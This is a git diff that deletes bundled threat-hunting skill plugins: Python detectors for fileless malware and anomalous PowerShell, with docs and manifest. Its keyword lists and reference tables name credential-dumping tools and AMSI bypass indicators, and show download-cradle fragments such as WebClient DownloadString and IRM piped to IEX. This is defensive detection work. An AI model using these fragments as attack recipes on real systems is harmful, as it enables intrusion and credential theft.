-                for pattern, desc in SUSPICIOUS_PS_PATTERNS:
-                    if re.search(pattern, xml, re.IGNORECASE):
-                        alerts.append({
-                            "event_id": 4104,
-                            "timestamp": record.timestamp().isoformat(),
-                            "detection": desc,
-                            "snippet": xml[:500],
-                        })
-                        break
-            except Exception:
-                continue
-
-    return {"log_file": ps_log, "suspicious_events": len(alerts), "alerts": alerts[:50]}
-
-
-def scan_sysmon_for_lolbins(log_dir=None):
-    """Scan Sysmon logs for LOLBin process creation events."""
-    if not log_dir:
-        log_dir = r"C:\Windows\System32\winevt\Logs"
-
-    sysmon_log = os.path.join(log_dir, "Microsoft-Windows-Sysmon%4Operational.evtx")
-    if not os.path.exists(sysmon_log) or not HAS_EVTX:
-        return {"error": "Sysmon log not found or python-evtx not installed"}
-
-    detections = []
-    with evtx.Evtx(sysmon_log) as log:
-        for record in log.records():
-            try:
-                xml = record.xml()
-                if "<EventID>1</EventID>" not in xml:
-                    continue
-                for lolbin, info in LOLBINS.items():
-                    if lolbin.lower() in xml.lower():
-                        detections.append({
-                            "timestamp": record.timestamp().isoformat(),
-                            "lolbin": lolbin,
-                            "risk": info["risk"],
-                            "known_abuse": info["usage"],
-                            "snippet": xml[:500],
-                        })
-                        break
-            except Exception:
-                continue
-
-    return {"log_file": sysmon_log, "lolbin_detections": len(detections), "detections": detections[:50]}
-
-
-def scan_wmi_persistence():
-    """Detect WMI event subscription persistence mechanisms."""
-    cmd = [
-        "powershell", "-Command",
-        "Get-WMIObject -Namespace root\\Subscription -Class __EventFilter | "
-        "Select-Object Name, Query | ConvertTo-Json"
-    ]
-    try:
-        result = subprocess.run(cmd, capture_output=True, text=True, timeout=15)
-        if result.returncode == 0 and result.stdout.strip():
-            filters = json.loads(result.stdout)
-            if not isinstance(filters, list):
-                filters = [filters]
-            return {"wmi_event_filters": filters, "count": len(filters)}
-        return {"wmi_event_filters": [], "count": 0}
-    except Exception as e:
-        return {"error": str(e)}
-
-
-def scan_registry_run_keys():
-    """Check registry Run keys for suspicious persistence entries."""
-    keys_to_check = [
-        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
-        r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
-        r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
-    ]
-    results = []
-    for key in keys_to_check:
-        cmd = ["reg", "query", key]
-        try:
-            r = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
-            if r.returncode == 0:
-                for line in r.stdout.strip().splitlines():
-                    line = line.strip()
-                    if line and not line.startswith("HKEY"):
-                        for lolbin in LOLBINS:
-                            if lolbin.lower() in line.lower():
-                                results.append({
-                                    "key": key,
-                                    "entry": line,
-                                    "lolbin_detected": lolbin,
-                                    "risk": "HIGH",
-                                })
-        except Exception:
-            continue
-    return {"registry_persistence": results, "count": len(results)}
-
-
-def run_volatility_malfind(memory_dump):
-    """Run Volatility malfind to detect injected code in memory."""
-    if not os.path.exists(memory_dump):
-        return {"error": f"Memory dump not found: {memory_dump}"}
-    cmd = ["vol3", "-f", memory_dump, "windows.malfind"]
-    try:
-        result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
-        return {"output": result.stdout.strip(), "exit_code": result.returncode}
-    except FileNotFoundError:
-        return {"error": "Volatility 3 (vol3) not installed"}
-    except subprocess.TimeoutExpired:
-        return {"error": "Volatility analysis timed out"}
-
-
-def generate_report():
-    """Generate fileless malware detection report."""
-    return {
-        "timestamp": datetime.utcnow().isoformat() + "Z",
-        "powershell_scan": scan_powershell_logs(),
-        "lolbin_scan": scan_sysmon_for_lolbins(),
-        "wmi_persistence": scan_wmi_persistence(),
-        "registry_persistence": scan_registry_run_keys(),
-    }
-
-
-if __name__ == "__main__":
-    action = sys.argv[1] if len(sys.argv) > 1 else "report"
-    if action == "report":
-        print(json.dumps(generate_report(), indent=2, default=str))
-    elif action == "powershell":
-        log_dir = sys.argv[2] if len(sys.argv) > 2 else None
-        print(json.dumps(scan_powershell_logs(log_dir), indent=2, default=str))
-    elif action == "lolbins":
-        print(json.dumps(scan_sysmon_for_lolbins(), indent=2, default=str))
-    elif action == "wmi":
-        print(json.dumps(scan_wmi_persistence(), indent=2))
-    elif action == "registry":
-        print(json.dumps(scan_registry_run_keys(), indent=2))
-    elif action == "malfind" and len(sys.argv) > 2:
-        print(json.dumps(run_volatility_malfind(sys.argv[2]), indent=2))
-    else:
-        print("Usage: agent.py [report|powershell [log_dir]|lolbins|wmi|registry|malfind <memory.dmp>]")
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/LICENSE b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/LICENSE
deleted file mode 100644
index d8851182d..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/LICENSE
+++ /dev/null
@@ -1,201 +0,0 @@
-
-                                 Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to the Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by the Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding any notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. Please do not remove or change
-      the license header comment from a contributed file except when
-      necessary.
-
-   Copyright 2026 mukul975
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/SKILL.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/SKILL.md
deleted file mode 100644
index 5f7c60a26..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/SKILL.md
+++ /dev/null
@@ -1,73 +0,0 @@
----
-name: hunting-for-anomalous-powershell-execution
-description: 'Hunt for malicious PowerShell activity by analyzing Script Block Logging (Event 4104), Module Logging (Event
-  4103), and process creation events. The analyst parses Windows Event Log EVTX files to detect obfuscated commands, AMSI
-  bypass attempts, encoded payloads, credential dumping keywords, and suspicious download cradles. Activates for requests
-  involving PowerShell threat hunting, script block analysis, encoded command detection, or AMSI bypass identification.
-
-  '
-domain: cybersecurity
-subdomain: threat-hunting
-tags:
-- powershell
-- script-block-logging
-- event-4104
-- amsi
-- threat-hunting
-- evtx
-- obfuscation
-version: '1.0'
-author: mahipal
-license: Apache-2.0
-nist_csf:
-- DE.CM-01
-- DE.AE-02
-- DE.AE-07
-- ID.RA-05
----
-# Hunting for Anomalous PowerShell Execution
-
-## Overview
-
-PowerShell Script Block Logging (Event ID 4104) records the full deobfuscated script text
-executed on a Windows endpoint, making it the primary data source for hunting malicious
-PowerShell. Combined with Module Logging (4103) and process creation events, analysts can
-detect encoded commands, AMSI bypass patterns, download cradles, credential theft tools,
-and fileless attack techniques even when the attacker uses obfuscation layers.
-
-
-## When to Use
-
-- When investigating security incidents that require hunting for anomalous powershell execution
-- When building detection rules or threat hunting queries for this domain
-- When SOC analysts need structured procedures for this analysis type
-- When validating security monitoring coverage for related attack techniques
-
-## Prerequisites
-
-- Windows Event Log exports (.evtx) from Microsoft-Windows-PowerShell/Operational
-- Python 3.8+ with python-evtx and lxml libraries
-- Script Block Logging enabled via Group Policy
-- Understanding of common PowerShell attack techniques
-
-## Steps
-
-1. Parse EVTX files extracting Event 4104 script block text and metadata
-2. Reassemble multi-part script blocks using ScriptBlock ID correlation
-3. Scan script text for AMSI bypass indicators and obfuscation patterns
-4. Detect encoded command execution and base64 payloads
-5. Identify download cradles, credential dumping, and lateral movement commands
-6. Score and prioritize findings by threat severity
-
-## Expected Output
-
-```json
-{
-  "total_events": 1247,
-  "suspicious_events": 23,
-  "amsi_bypass_attempts": 2,
-  "encoded_commands": 8,
-  "download_cradles": 5,
-  "credential_access": 3
-}
-```
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/manifest.json b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/manifest.json
deleted file mode 100644
index e02d487d5..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/manifest.json
+++ /dev/null
@@ -1,65 +0,0 @@
-{
-  "schemaVersion": "hub.plugin.v1",
-  "id": "hunting-for-anomalous-powershell-execution",
-  "type": "skill",
-  "name": "hunting-for-anomalous-powershell-execution",
-  "description": "Hunt for malicious PowerShell activity by analyzing Script Block Logging (Event 4104), Module Logging (Event 4103), and process creation events. The analyst parses Windows Event Log EVTX files to detect obfuscated commands, AMSI bypass attempts, encoded payloads, credential dumping keywords, and suspicious download cradles. Activates for requests involving PowerShell threat hunting, script block analysis, encoded command detection, or AMSI bypass identification.",
-  "version": "1.0",
-  "author": "mahipal",
-  "license": "Apache-2.0",
-  "homepage": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
-  "category": "detection",
-  "tags": [
-    "iam",
-    "windows",
-    "ioc"
-  ],
-  "useCases": [
-    "log-analysis"
-  ],
-  "domains": [
-    "security-ops"
-  ],
-  "capabilities": [
-    "llm-agent",
-    "file-analysis"
-  ],
-  "trust": "community",
-  "source": {
-    "kind": "bundled",
-    "path": ".flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution"
-  },
-  "compatibility": {
-    "flocks": ">=0.8.0",
-    "os": [
-      "darwin",
-      "linux",
-      "windows"
-    ]
-  },
-  "dependencies": {
-    "skills": [],
-    "tools": [],
-    "python": [],
-    "external": []
-  },
-  "permissions": {
-    "tools": [],
-    "network": false,
-    "shell": false,
-    "filesystem": "read"
-  },
-  "risk": {
-    "level": "low",
-    "reasons": []
-  },
-  "entrypoints": [
-    "SKILL.md"
-  ],
-  "checksums": {},
-  "upstream": {
-    "name": "mukul975/Anthropic-Cybersecurity-Skills",
-    "url": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
-  },
-  "sourceNotice": "Source: This skill is adapted from the open-source project https://github.com/mukul975/Anthropic-Cybersecurity-Skills."
-}
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/references/api-reference.md b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/references/api-reference.md
deleted file mode 100644
index 46e0d327b..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/references/api-reference.md
+++ /dev/null
@@ -1,106 +0,0 @@
-# Hunting for Anomalous PowerShell Execution — API Reference
-
-## Windows Event Log IDs
-
-| Event ID | Log Source | Description |
-|----------|-----------|-------------|
-| 4104 | Microsoft-Windows-PowerShell/Operational | Script Block Logging — full deobfuscated script text |
-| 4103 | Microsoft-Windows-PowerShell/Operational | Module Logging — pipeline execution details |
-| 4688 | Security | Process Creation with command line auditing |
-| 800 | Windows PowerShell | Pipeline execution (classic log) |
-
-## Event 4104 XML Fields
-
-| Field | Path | Description |
-|-------|------|-------------|
-| ScriptBlockText | EventData/Data[@Name='ScriptBlockText'] | Full script block content |
-| ScriptBlockId | EventData/Data[@Name='ScriptBlockId'] | GUID linking multi-part blocks |
-| MessageNumber | EventData/Data[@Name='MessageNumber'] | Part number for split blocks |
-| MessageTotal | EventData/Data[@Name='MessageTotal'] | Total parts in split block |
-| Path | EventData/Data[@Name='Path'] | Script file path (if applicable) |
-
-## AMSI Bypass Indicators
-
-| Indicator | Context |
-|-----------|---------|
-| `System.Management.Automation.AmsiUtils` | Reflection access to AMSI internals |
-| `amsiInitFailed` | Setting AMSI init flag to bypass scanning |
-| `AmsiScanBuffer` | Patching the scan buffer function |
-| `amsi.dll` | Direct DLL manipulation |
-| `VirtualProtect` | Memory protection change for AMSI patching |
-| `Marshal::Copy` | Overwriting AMSI function bytes in memory |
-
-## Suspicious PowerShell Keywords
-
-| Keyword | Category |
-|---------|----------|
-| `Invoke-Mimikatz` | Credential Dumping |
-| `Invoke-Kerberoast` | Credential Access |
-| `Invoke-ShellCode` | Code Injection |
-| `Invoke-ReflectivePEInjection` | Process Injection |
-| `PowerView` | Active Directory Enumeration |
-| `SharpHound` / `BloodHound` | AD Attack Path Mapping |
-| `Rubeus` | Kerberos Ticket Manipulation |
-| `Out-Minidump` | LSASS Memory Dumping |
-
-## Download Cradle Patterns
-
-| Pattern | Example |
-|---------|---------|
-| `Net.WebClient` | `(New-Object Net.WebClient).DownloadString(...)` |
-| `Invoke-WebRequest` | `IWR -Uri http://... -OutFile ...` |
-| `DownloadString` | `$wc.DownloadString('http://...')` |
-| `Start-BitsTransfer` | `Start-BitsTransfer -Source http://...` |
-| `Invoke-RestMethod` | `IRM http://... \| IEX` |
-
-## Obfuscation Indicators
-
-| Pattern | Description |
-|---------|-------------|
-| `-EncodedCommand` / `-enc` | Base64-encoded PowerShell command |
-| `IEX` / `Invoke-Expression` | Dynamic execution of string content |
-| `[Convert]::FromBase64String` | Base64 decoding in script |
-| `-join [char[]]` | Character array concatenation obfuscation |
-| `.Replace()` chaining | String substitution for keyword evasion |
-
-## python-evtx Library Usage
-
-```python
-import Evtx.Evtx as evtx
-from lxml import etree
-
-with evtx.Evtx("PowerShell-Operational.evtx") as log:
-    for record in log.records():
-        xml = record.xml()
-        root = etree.fromstring(xml.encode("utf-8"))
-        # Extract EventID, EventData fields
-```
-
-## CLI Usage
-
-```bash
-# Hunt for suspicious PowerShell in EVTX file
-python agent.py --evtx /path/to/PowerShell-Operational.evtx
-
-# Limit events parsed
-python agent.py --evtx logs.evtx --max-events 5000
-
-# Save report to JSON
-python agent.py --evtx logs.evtx --output hunt_report.json
-```
-
-## Group Policy Settings for Script Block Logging
-
-```
-Computer Configuration > Administrative Templates > Windows Components
-  > Windows PowerShell > Turn on PowerShell Script Block Logging
-    -> Enabled
-    -> Log script block invocation start / stop events: Checked
-```
-
-## External References
-
-- [Splunk: Hunting for Malicious PowerShell using Script Block Logging](https://www.splunk.com/en_us/blog/security/hunting-for-malicious-powershell-using-script-block-logging.html)
-- [block-parser: PowerShell Script Block Log Parser](https://github.com/matthewdunwoody/block-parser)
-- [Windows Forensic Artifacts: EVTX 4104](https://github.com/Psmths/windows-forensic-artifacts/blob/main/execution/evtx-4104-script-block-logging.md)
-- [Elastic: AMSI Bypass via PowerShell Detection Rule](https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/windows/defense_evasion_amsi_bypass_powershell)
diff --git a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/scripts/agent.py b/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/scripts/agent.py
deleted file mode 100644
index 82acc1829..000000000
--- a/.flocks/flockshub/plugins/skills/Anthropic-Cybersecurity-Skills/hunting-for-anomalous-powershell-execution/scripts/agent.py
+++ /dev/null
@@ -1,247 +0,0 @@
-#!/usr/bin/env python3
-"""PowerShell Script Block Logging threat hunting agent."""
-
-import json
-import sys
-import argparse
-import base64
-import re
-from datetime import datetime
-from collections import defaultdict
-
-try:
-    import Evtx.Evtx as evtx
-    from lxml import etree
-except ImportError:
-    print("Install: pip install python-evtx lxml")
-    sys.exit(1)
-
-NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
-
-AMSI_INDICATORS = [
-    "amsiutils", "amsiinitfailed", "amsicontext", "amsisession",
-    "amsiinitialize", "amsi.dll", "amsiScanBuffer",
-    "System.Management.Automation.AmsiUtils",
-]
-
-SUSPICIOUS_KEYWORDS = [
-    "Invoke-Mimikatz", "Invoke-Kerberoast", "Invoke-ShellCode",
-    "Invoke-ReflectivePEInjection", "Invoke-TokenManipulation",
-    "Get-GPPPassword", "Get-Keystrokes", "Get-TimedScreenshot",
-    "Out-Minidump", "Invoke-NinjaCopy", "Invoke-CredentialInjection",
-    "Invoke-DllInjection", "Invoke-WMICommand", "PowerSploit",
-    "Empire", "BloodHound", "Rubeus", "SharpHound",
-    "Invoke-PSInject", "Invoke-RunAs", "PowerView",
-]
-
-DOWNLOAD_PATTERNS = [
-    r"Net\.WebClient", r"Invoke-WebRequest", r"wget\s", r"curl\s",
-    r"DownloadString", r"DownloadFile", r"DownloadData",
-    r"Start-BitsTransfer", r"Invoke-RestMethod",
-    r"New-Object\s+IO\.MemoryStream",
-]
-
-OBFUSCATION_PATTERNS = [
-    r"-[Ee]nc(?:oded)?[Cc]ommand",
-    r"\-e\s+[A-Za-z0-9+/=]{20,}",
-    r"IEX\s*\(",
-    r"Invoke-Expression",
-    r"\[Convert\]::FromBase64String",
-    r"\[System\.Text\.Encoding\]::",
-    r"\.Replace\(['\"][^'\"]+['\"],\s*['\"][^'\"]+['\"]\)",
-    r"-join\s*\[char\[\]\]",
-    r"\$env:comspec",
-]
-
-
-def parse_evtx_4104(evtx_path, max_events=10000):
-    """Parse Event 4104 script block logging entries from EVTX."""
-    events = []
-    count = 0
-    with evtx.Evtx(evtx_path) as log:
-        for record in log.records():
-            if count >= max_events:
-                break
-            xml = record.xml()
-            root = etree.fromstring(xml.encode("utf-8"))
-            event_id_el = root.find(".//e:System/e:EventID", NS)
-            if event_id_el is None or event_id_el.text != "4104":
-                continue
-            count += 1
-            time_el = root.find(".//e:System/e:TimeCreated", NS)
-            timestamp = time_el.get("SystemTime", "") if time_el is not None else ""
-            data = {}
-            for el in root.findall(".//e:EventData/e:Data", NS):
-                name = el.get("Name", "")
-                data[name] = el.text or ""
-            events.append({
-                "timestamp": timestamp,
-                "script_block_id": data.get("ScriptBlockId", ""),
-                "script_block_text": data.get("ScriptBlockText", ""),
-                "message_number": data.get("MessageNumber", "1"),
-                "message_total": data.get("MessageTotal", "1"),
-                "path": data.get("Path", ""),
-            })
-    return events
-
-
-def reassemble_script_blocks(events):
-    """Reassemble multi-part script blocks by ScriptBlockId."""
-    blocks = defaultdict(list)
-    for ev in events:
-        sb_id = ev.get("script_block_id", "")
-        if sb_id:
-            blocks[sb_id].append(ev)
-    assembled = []
-    for sb_id, parts in blocks.items():
-        parts.sort(key=lambda x: int(x.get("message_number", "1")))
-        full_text = "".join(p.get("script_block_text", "") for p in parts)
-        assembled.append({
-            "script_block_id": sb_id,
-            "timestamp": parts[0].get("timestamp", ""),
-            "path": parts[0].get("path", ""),
-            "parts": len(parts),
-            "full_text": full_text,
-        })
-    return assembled
-
-
-def detect_amsi_bypass(script_text):
-    """Check script text for AMSI bypass indicators."""
-    findings = []
-    lower = script_text.lower()
-    for indicator in AMSI_INDICATORS:
-        if indicator.lower() in lower:
-            findings.append({"type": "amsi_bypass", "indicator": indicator})
-    return findings
-
-
-def detect_suspicious_keywords(script_text):
-    """Check for known offensive tool keywords."""
-    findings = []
-    for kw in SUSPICIOUS_KEYWORDS:
-        if kw.lower() in script_text.lower():
-            findings.append({"type": "credential_or_offensive_tool", "keyword": kw})
-    return findings
-
-
-def detect_download_cradles(script_text):
-    """Detect download cradle patterns in script text."""
-    findings = []
-    for pattern in DOWNLOAD_PATTERNS:
-        if re.search(pattern, script_text, re.IGNORECASE):
-            findings.append({"type": "download_cradle", "pattern": pattern})
-    return findings
-
-
-def detect_obfuscation(script_text):
-    """Detect obfuscation and encoded command patterns."""
-    findings = []
-    for pattern in OBFUSCATION_PATTERNS:
-        if re.search(pattern, script_text, re.IGNORECASE):
-            findings.append({"type": "obfuscation", "pattern": pattern})
-    b64_match = re.search(r"[A-Za-z0-9+/=]{40,}", script_text)
-    if b64_match:
-        try:
-            decoded = base64.b64decode(b64_match.group()).decode("utf-16-le", errors="ignore")
-            if any(c.isalpha() for c in decoded[:20]):
-                findings.append({
-                    "type": "encoded_payload",
-                    "decoded_preview": decoded[:200],
-                })
-        except Exception:
-            pass
-    return findings
-
-
-def hunt_scripts(assembled_blocks):
-    """Run all detection checks on assembled script blocks."""
-    results = []
-    for block in assembled_blocks:
-        text = block.get("full_text", "")
-        if not text.strip():
-            continue
-        findings = []
-        findings.extend(detect_amsi_bypass(text))
-        findings.extend(detect_suspicious_keywords(text))
-        findings.extend(detect_download_cradles(text))
-        findings.extend(detect_obfuscation(text))
-        if findings:
-            results.append({
-                "script_block_id": block["script_block_id"],
-                "timestamp": block["timestamp"],
-                "path": block["path"],
-                "text_preview": text[:300],
-                "findings": findings,
-                "severity": "high" if any(
-                    f["type"] in ("amsi_bypass", "credential_or_offensive_tool")
-                    for f in findings
-                ) else "medium",
-            })
-    return results
-
-
-def run_audit(args):
-    """Execute PowerShell script block hunting."""
-    print(f"\n{'='*60}")
-    print(f"  POWERSHELL SCRIPT BLOCK HUNTING")
-    print(f"  Generated: {datetime.utcnow().isoformat()} UTC")
-    print(f"{'='*60}\n")
-
-    report = {}
-    events = parse_evtx_4104(args.evtx, args.max_events)
-    report["total_4104_events"] = len(events)
-    print(f"Parsed {len(events)} Event 4104 records\n")
-
-    blocks = reassemble_script_blocks(events)
-    report["unique_script_blocks"] = len(blocks)
-    print(f"Reassembled {len(blocks)} unique script blocks\n")
-
-    results = hunt_scripts(blocks)
-    report["suspicious_blocks"] = len(results)
-    report["findings"] = results
-
-    amsi = sum(1 for r in results if any(f["type"] == "amsi_bypass" for f in r["findings"]))
-    cred = sum(1 for r in results if any(f["type"] == "credential_or_offensive_tool" for f in r["findings"]))
-    dl = sum(1 for r in results if any(f["type"] == "download_cradle" for f in r["findings"]))
-    obf = sum(1 for r in results if any(f["type"] == "obfuscation" for f in r["findings"]))
-    report["summary"] = {
-        "amsi_bypass_attempts": amsi,
-        "credential_access": cred,
-        "download_cradles": dl,
-        "obfuscation_detected": obf,
-    }
-
-    print(f"--- HUNT RESULTS ---")
-    print(f"  AMSI bypass attempts: {amsi}")
-    print(f"  Credential/offensive tools: {cred}")
-    print(f"  Download cradles: {dl}")
-    print(f"  Obfuscation detected: {obf}")
-    print(f"\n--- HIGH SEVERITY ---")
-    for r in results[:15]:
-        if r["severity"] == "high":
-            print(f"  [{r['timestamp']}] {r['script_block_id']}")
-            for f in r["findings"]:
-                print(f"    {f['type']}: {f.get('keyword', f.get('indicator', ''))}")
-
-    return report
-
-
-def main():
-    parser = argparse.ArgumentParser(description="PowerShell Script Block Hunting Agent")
-    parser.add_argument("--evtx", required=True,
-                        help="Path to PowerShell Operational .evtx file")
-    parser.add_argument("--max-events", type=int, default=10000,
-                        help="Max events to parse (default: 10000)")
-    parser.add_argument("--output", help="Save report to JSON file")
-    args = parser.parse_args()
-
-    report = run_audit(args)
-    if args.output:
-        with open(args.output, "w") as f:
-            json.dump(report, f, indent=2, default=str)
-        print(f"\n[+] Report saved to {args.output}")
-
-
